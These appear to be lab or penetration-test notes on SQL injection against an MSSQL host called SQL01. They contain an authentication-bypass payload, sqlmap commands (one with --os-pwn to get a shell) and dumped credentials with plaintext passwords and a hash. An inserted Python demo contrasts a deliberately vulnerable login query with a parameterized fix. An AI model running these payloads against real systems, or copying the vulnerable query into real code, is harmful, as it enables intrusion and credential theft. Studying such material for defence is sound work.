which then leads to the login page.
admin' OR '1'='1--
Used the above payload to bypass the authentication.
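Why that payload gets past a login check that builds its SQL by string concatenation, and how the same check behaves once the query is parameterized, as an added example (not code from these notes); the `Users` table and its rows are constructed for the demo.

```python
import sqlite3

# Constructed demo table: one low-privilege user and an "admin" account.
# Passwords are stored in plaintext only to mirror the dumped table above;
# a real application would compare a password hash instead.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserID INTEGER, Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES (1, 'bob', 'demo-pass-1')")
    conn.execute("INSERT INTO Users VALUES (2, 'admin', 'demo-pass-2')")
    return conn


def login_vulnerable(conn, username, password):
    # The username is pasted straight into the SQL text. With the payload
    # admin' OR '1'='1--  the WHERE clause becomes
    #   Username = 'admin' OR '1'='1--' AND Password = '<whatever>'
    # The injected quote closes the literal early, and OR binds more loosely
    # than AND, so the row for 'admin' matches regardless of the password.
    sql = ("SELECT Username FROM Users WHERE Username = '" + username
           + "' AND Password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    # Placeholders send the values separately from the statement text, so the
    # quote and the OR are just characters inside a username that does not exist.
    row = conn.execute(
        "SELECT Username FROM Users WHERE Username = ? AND Password = ?",
        (username, password),
    ).fetchone()
    return row is not None


PAYLOAD = "admin' OR '1'='1--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with payload:", login_vulnerable(db, PAYLOAD, "wrong"))
    print("parameterized login with payload:", login_parameterized(db, PAYLOAD, "wrong"))
```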
SOAP envelope
- Downloaded the Wsdler extension in Burp Suite
- Changed the POST request to have wsdl at the end
- Sent it to Wsdler
- Saved the file as req.txt (the one with Dev)
- Used sqlmap to dump everything
proxychains sqlmap -r req.txt --dbs --level 5 --risk 3 -v 3 --current-user
sqlmap -r req.txt --dbs --level 5 --risk 3 -v 3 --os-pwn
+--------+-------------+----------+
| UserID | Password    | Username |
+--------+-------------+----------+
| 1      | Str0ngP@ss! | Bob      |
| 2      | S3cretP@ss! | Rob      |
| 3      | Harder!     | Try      |
+--------+-------------+----------+
[*] BUILTIN\Users
[*] NT AUTHORITY\SYSTEM
[*] NT Service\MSSQL$SQLEXPRESS
[*] NT SERVICE\SQLWriter
[*] NT SERVICE\Winmgmt
[*] sa (administrator)
[*] SQL01\Administrator
[*] sql_read
| eb900f7d1ed53c96cd85dddb49c8ed4a | admin
Getting a Shell on SQL01
- Parameter 2 worked, not parameter 1.
- The last parameter is always better.